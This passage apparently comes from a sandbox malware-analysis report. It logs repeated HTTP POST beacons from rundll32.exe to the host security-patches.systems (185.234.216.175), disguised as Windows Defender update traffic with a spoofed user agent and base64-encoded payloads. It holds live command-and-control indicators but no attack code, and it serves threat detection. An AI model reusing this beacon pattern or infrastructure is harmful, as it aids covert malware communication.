                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:47.773425102 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:47 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.449793185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:48.032160997 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:49.501842022 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:49 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.449798185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:49.910649061 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:51.372632027 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:51 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.449804185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:51.639734983 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:53.088341951 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:52 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.449806185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:53.357587099 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:54.792453051 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:54 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              29192.168.2.449811185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:55.070889950 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:56.693231106 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:56 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              30192.168.2.449817185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:56.950488091 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:58.448982000 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:58 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              31192.168.2.449823185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:58.778930902 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:00.252599955 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:59 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.449829185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:00.515227079 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:02.166407108 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:01 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.449831185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:02.437602997 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:03.884746075 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:03 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.449836185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:04.152476072 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:21:05.618777037 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:21:05 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.449842185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:21:05.900727034 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
